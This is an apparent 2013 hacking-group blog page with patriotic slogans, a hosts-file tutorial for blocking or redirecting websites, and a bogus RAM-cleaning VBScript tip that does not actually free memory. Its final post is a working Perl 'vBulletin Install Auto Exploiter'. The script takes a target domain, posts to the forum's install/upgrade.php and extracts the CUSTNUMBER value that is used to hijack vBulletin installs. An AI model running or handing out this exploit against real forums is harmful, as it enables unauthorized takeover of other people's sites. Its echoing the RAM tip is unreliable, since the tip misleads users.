1ND14N H4X0R5 T34M (IHT) JAI HIND JAI BHARAT

We are :- DeadManINDIA,Null_Port_Govind,Haxor Rahul,EagleShadow,Karate-Katrina,Spy-Hunter,Grey-Noob,Mr.R@66!T.

A big Slute to Our Indian Armies

Freedom is not free Our Soldiers Donates theirs lifes for us

We are Indians and We are Proud to be Indians

India is great.Because their is one place in the world where Peoples Recpect all Religious.

Kali is good OS for Hacking

Peoples Says this OS is best This OS is best but no one OS like Kali Linux .

MOM and DAD

I can't saw God but When i see my MOM and DAD then i think God in there they are My Gods Love You MOM DAD.

Saturday 21 September 2013

How to block and replace a website on a PC.

How to block and replace a website on a PC.

My computer=> C drive => Windows=>System32=>drivers=>etc=> host file

Open host file in WordPad or notepad

Now open CMD and type in CMD ping www.google.com then copy the IP Address of Google website

In host file just write the IPaddress of Google website that you copy and name of the website which one you want to block.

Like:
87.248.112.181 www.facebook.com

in this case you will type in URL www.facebook.com but Google website will open.

for block:
type 127.0.0.1 www.facebook.com or www.yahoo.com

it’s not going to open which one you will type.

Hope you found it useful
------------------------------------------
How to unblock?
just delete that line from the file.

Monday 16 September 2013

Cleaning RAM without any Software

Cleaning RAM without any Software

Cleaning RAM is very easy task here are steps for it, just follow them:


1). Open notepad.

2). Type FreeMem=Space(64000000).

3). Save file with name "CleanRAM.vbs".

4). Close it and run the file.

It will free memory in RAM, if you want to free more memory than you can write following command in notepad instead of what given in step 2.

FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb
FreeMem= (72000000) for 72 mb
FreeMem= (64000000) for 64 mb
FreeMem= (32000000) for 32 mb
FreeMem= (24000000) for 24 mb

Make sure that you don't select the memory that is larger than your memory capacity.

Sunday 15 September 2013

vBulletin Zero-Day Exploit in perl leaked

Perl

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}

$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;


sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);

print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}